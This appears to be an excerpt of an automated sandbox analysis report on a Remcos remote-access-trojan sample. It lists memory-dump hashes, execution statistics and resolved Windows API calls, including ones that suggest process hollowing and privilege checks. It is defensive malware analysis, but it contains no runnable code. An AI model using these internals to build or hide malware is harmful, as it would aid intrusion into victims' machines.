                        • Instruction Fuzzy Hash: EAF059313103016BC6209B76E8C4A4A7FEAEB81230701853AF005CB261DEA0EC058BD5
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62a4bb6fc97d171f5365a79ae0a8b96f5eaccced7d1f11e6d6bf57636b8df1f8
                        • Instruction ID: cdf7d607b452fbd67378b77c871468ccb42082d657f3adb533fbc1d227dacd93
                        • Opcode Fuzzy Hash: 62a4bb6fc97d171f5365a79ae0a8b96f5eaccced7d1f11e6d6bf57636b8df1f8
                        • Instruction Fuzzy Hash: 9FF054357006149FC7249F1AE48496AB7ABEFC8721B11055DE50A8B761DF31FC42CB95
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                        • Instruction ID: 4243ceffdd30f352615e2fe6667d750750fc4abca0ae9b7f9b7c733986b7bd1f
                        • Opcode Fuzzy Hash: e26b3b693c3fa3a092213b46d9974f97095fdf38ae2968b16eb170a88f8efb51
                        • Instruction Fuzzy Hash: 0601B675D00609DFCB40EFACC54589DBBF4FF49210B1185AAE859EB321E770AA44CF91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15393280be9a7f34eb74a2fca06d1163354248f8ea14f56cd65e71f8da1cc089
                        • Instruction ID: 58f69e66a2607f97fb846a95069d565a3c6aed87089e498bba7597f618c08523
                        • Opcode Fuzzy Hash: 15393280be9a7f34eb74a2fca06d1163354248f8ea14f56cd65e71f8da1cc089
                        • Instruction Fuzzy Hash: C5F067302412109FC314CB38E888D997BEABF4A724B028499F04ACF372DB72EC40CB80
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f50645077db37916b90519615f1742fa2ee64d6c9c070c3ef0eb72c93be6a66
                        • Instruction ID: 8730e258328455c0997df33fecb42a4b878bf66e891b7f45a95c84a3e81c95e6
                        • Opcode Fuzzy Hash: 1f50645077db37916b90519615f1742fa2ee64d6c9c070c3ef0eb72c93be6a66
                        • Instruction Fuzzy Hash: 4CF0A01260E2D02FE33303A85C312913FF88E4716574904DBD584DB6A2E148A8269366
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 268a116fd552d8a0d5001fbb5119746e879d9f3be554696a8dbc7716fc3c32b3
                        • Instruction ID: 730176d25912e0d57c07ef78a9980fbbb03df1df0556f98c335755512a079392
                        • Opcode Fuzzy Hash: 268a116fd552d8a0d5001fbb5119746e879d9f3be554696a8dbc7716fc3c32b3
                        • Instruction Fuzzy Hash: E0E09275B00A144B9748FB6EA40486AF7DBAFC8710308C0BED60DC7764ED70AC028A91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b221f828fb2936a6e485ffef47acf4c88f9000fc779541b3c86e70963a2f949
                        • Instruction ID: a78195dfe2109c58998a454eabc733de7d94d037655c97bc5731733d85d09e52
                        • Opcode Fuzzy Hash: 7b221f828fb2936a6e485ffef47acf4c88f9000fc779541b3c86e70963a2f949
                        • Instruction Fuzzy Hash: 20E04F72B001142BA748EEB99C405EFBBFADB84595B10C07AD409E7240FE30AD0347D0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8f68ce702e0a6abf208f615eb3a2057a909160dde73a43d8621c790ccef4f84
                        • Instruction ID: cfb8b7b9f6b9885b9c3a16c02076b4c88aead88c6592a9778e7e94b01796ff2e
                        • Opcode Fuzzy Hash: a8f68ce702e0a6abf208f615eb3a2057a909160dde73a43d8621c790ccef4f84
                        • Instruction Fuzzy Hash: 78F0DF30210610CFC718DB28D588C597BE6EF4AB1971245A9E10ACF772CB72EC41CB80
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab1fb1c5d4ff491bd3f7f895fda4224972eac1bf763502916de8be076c4fce64
                        • Instruction ID: 39b8a4031b532f310002588e43f13de2513a8d4d811c8afc867ea09dc31dc627
                        • Opcode Fuzzy Hash: ab1fb1c5d4ff491bd3f7f895fda4224972eac1bf763502916de8be076c4fce64
                        • Instruction Fuzzy Hash: 3CF0E5B0E0A349AFDB01FF70E841498BBB6EB46210B10809DD405DB255E6310F038B51
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6d55a5fe4353ae1a71367cf29abfa90119c23e7492b99caedcec82a598ffb150
                        • Instruction ID: 378c833f039de9d24ba08bef59d2d12cad4270bf2e4a25866857ff6cd8810927
                        • Opcode Fuzzy Hash: 6d55a5fe4353ae1a71367cf29abfa90119c23e7492b99caedcec82a598ffb150
                        • Instruction Fuzzy Hash: 0BE086303147445FC318CB6EE440A997BE9DB89761B1486AEF046C7762DE61FD064B84
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cb0138509d5cbad82e9434b9656f7215babbc939559dde9fb70bd0168f1c81a
                        • Instruction ID: d51330be6fad6de8cf9603b99e36161f58a8f51a298f4887e9759af982ae2b30
                        • Opcode Fuzzy Hash: 1cb0138509d5cbad82e9434b9656f7215babbc939559dde9fb70bd0168f1c81a
                        • Instruction Fuzzy Hash: 4AE0C230310708AFC328DB1CE890D9A73EAEF8877131489A9F01AD3321DE61FC054A88
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d1c1d2586d8340da781c7f5c8e44f4f9bb09eef60ca4dc9ecaa768fed90c9ed
                        • Instruction ID: 7fd7cab329ee82374ddf053febb0dd163b7f6ab3cb5a922fd0d2d3e77da268a1
                        • Opcode Fuzzy Hash: 3d1c1d2586d8340da781c7f5c8e44f4f9bb09eef60ca4dc9ecaa768fed90c9ed
                        • Instruction Fuzzy Hash: EAE07D752007041BD315E7FFA8005677FAFFFC8700704C16ED90983A05E93069028BD0
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a352af083fe2ebffbed151e1c0bb4926416e05cc373b1be5696a5b983141ccfc
                        • Instruction ID: 8fda3693f23ef4b3fc791b957f345ba7d8be67b44da45d403f510325885df52c
                        • Opcode Fuzzy Hash: a352af083fe2ebffbed151e1c0bb4926416e05cc373b1be5696a5b983141ccfc
                        • Instruction Fuzzy Hash: C1E0C2322001585FC3014778E818A967FF8EF4E215B0840A6FD05C7331CA20EC10D781
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 265f1239d08b122365642e41e38e56a0e05824c4385ccfe262758c28b18f4d11
                        • Instruction ID: 6fac646c460f8f6c7fbdc21c996b67900fe593bb7424b45ede30f66158d7123e
                        • Opcode Fuzzy Hash: 265f1239d08b122365642e41e38e56a0e05824c4385ccfe262758c28b18f4d11
                        • Instruction Fuzzy Hash: B7D0A7327412345F6B3837B4741406D339CCF8466B300087EEA0EC6600EE31982142E8
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c888d6c2f12c9b241e256bcf691731833b3f1b82caf8170fe21a03a0e8591d
                        • Instruction ID: edf683efc4eb8cb24bb38012a27f91744213016619a630e43588aeeed70b4191
                        • Opcode Fuzzy Hash: 07c888d6c2f12c9b241e256bcf691731833b3f1b82caf8170fe21a03a0e8591d
                        • Instruction Fuzzy Hash: C9E09A3660110DABDF01DF80E951BDEBB72FB98316F108015EA156A254C7725A26DB91
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fea4a9d02e8039fd070462c0396bfbd12d3af7b039df937a36ba4e48130d769f
                        • Instruction ID: 499d62dc1c25a298079c3c309fc22d5eaf544b86d34df6c9abff37379d258714
                        • Opcode Fuzzy Hash: fea4a9d02e8039fd070462c0396bfbd12d3af7b039df937a36ba4e48130d769f
                        • Instruction Fuzzy Hash: 5DE0BF70A06209EFDB00FFA4E94085DB7B6EB45214B508599D80997354EB726F109B55
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f197a04be02809bd37a189f08148b4b8690372a3aaa84deb4148f22cda91b8d0
                        • Instruction ID: 4ff60341b174506c80e079779e4c5629bbb6fb8acb039be54de834ef56d23278
                        • Opcode Fuzzy Hash: f197a04be02809bd37a189f08148b4b8690372a3aaa84deb4148f22cda91b8d0
                        • Instruction Fuzzy Hash: 1FD022333081A017F73103ECA8323863BDCCF8A578F4808B6EE08D3B40E448E8304199
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0608bd50f02646e89bf8818ed17ea090259c0feafd94b7c31aaf5d691146b9e1
                        • Instruction ID: c0a11ce576d7e259dedb2da7ab7439c092b2fde6342c5324428c85f74e979db1
                        • Opcode Fuzzy Hash: 0608bd50f02646e89bf8818ed17ea090259c0feafd94b7c31aaf5d691146b9e1
                        • Instruction Fuzzy Hash: 70D0C9363102289F87059B68E848CAA7BE9EB4D7613118066F909C7321CE71DC10CBD4
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                        • Instruction ID: 103967bf13f508402a192ef6221732069224ae084a114efb1bafc53f37aadea3
                        • Opcode Fuzzy Hash: c63055a45eeb4ae8ae8d6e3381b45a0748b663f32349da8a3f0a884f24e2bbca
                        • Instruction Fuzzy Hash: BCD0C93614010CEFCB01CF95D844D9A3BBAFF48720F008054FA084B232C332E821EB90
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9714bf9fc50829cfca30284e44502e5673edbc871c58fe48db3e242c0f655df
                        • Instruction ID: 490b9c5fac827ea4376c9e46ed41e3c7101fbb7865c4b630538ffa562e3e1319
                        • Opcode Fuzzy Hash: b9714bf9fc50829cfca30284e44502e5673edbc871c58fe48db3e242c0f655df
                        • Instruction Fuzzy Hash: 74B012CF80600037EF04E1319CC33426113DFFD206FE8F410448074500D51C82C32181
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                        • Instruction ID: 7c28c018d1549d70a96f05d8c5106c7b12b139b68069b277dd7e07b2750d14b6
                        • Opcode Fuzzy Hash: 8fc304a26ba6a9b8e09db51e88682a954301326f375d2764bec1dfa900b44145
                        • Instruction Fuzzy Hash: 51B09237A0400899EB108A84B4413EEF720E790226F204023C2119204193721165A6D1
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1680864574.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_4f30000_ZRuVeAoBoxootS.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a13036eb593b5ab7e398b7c17b7f47856420382d22ad3939a5fb77bad01b5bbf
                        • Instruction ID: 669b6de6fe35038feb8f8e33b436d85a45c125fd07efbe2d0685cd4b5b8c8421
                        • Opcode Fuzzy Hash: a13036eb593b5ab7e398b7c17b7f47856420382d22ad3939a5fb77bad01b5bbf
                        • Instruction Fuzzy Hash: 36B0122534510073FA04A1350EC422A0113DBC85163C0ED01284154000C91C6002500D

                        Execution Graph

                        Execution Coverage: 1.8%
                        Dynamic/Decrypted Code Coverage: 0%
                        Signature Coverage: 3.6%
                        Total number of Nodes: 632
                        Total number of Limit Nodes: 17
                        execution_graph: serialized execution graph (node addresses, API calls and edges, rooted at 404e06 WaitForSingleObject) that the original report renders as an interactive graph; the node and edge listing is not reproduced as text here.

                        Control-flow Graph

                        APIs
                        • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                        • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                        • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                        • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                        • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                        • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$HandleModule$LibraryLoad
                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                        • API String ID: 551388010-2474455403
                        • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                        • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                        • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                        • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                        Control-flow Graph

                        control_flow_graph 473 4407b5-4407c1 call 4461f8 476 4407e3-4407ef call 44083a ExitProcess 473->476 477 4407c3-4407d1 GetPEB 473->477 477->476 479 4407d3-4407dd GetCurrentProcess TerminateProcess 477->479 479->476
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                        • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                        • ExitProcess.KERNEL32 ref: 004407EF
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$CurrentExitTerminate
                        • String ID:
                        • API String ID: 1703294689-0
                        • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                        • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                        • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                        • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

                        Control-flow Graph

                        control_flow_graph: serialized basic-block graph for the function at 40d3f0 (entry block 40d3f0-40d45f, exit paths through 413980 and 401fb8) that the original report renders as an interactive graph; the block and edge listing is not reproduced as text here.
                        APIs
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                          • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                          • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                          • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                          • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                        • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                        • API String ID: 1529173511-1365410817
                        • Opcode ID: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                        • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                        • Opcode Fuzzy Hash: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                        • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                        Control-flow Graph

                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                        • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                        • closesocket.WS2_32(?), ref: 00404E3A
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
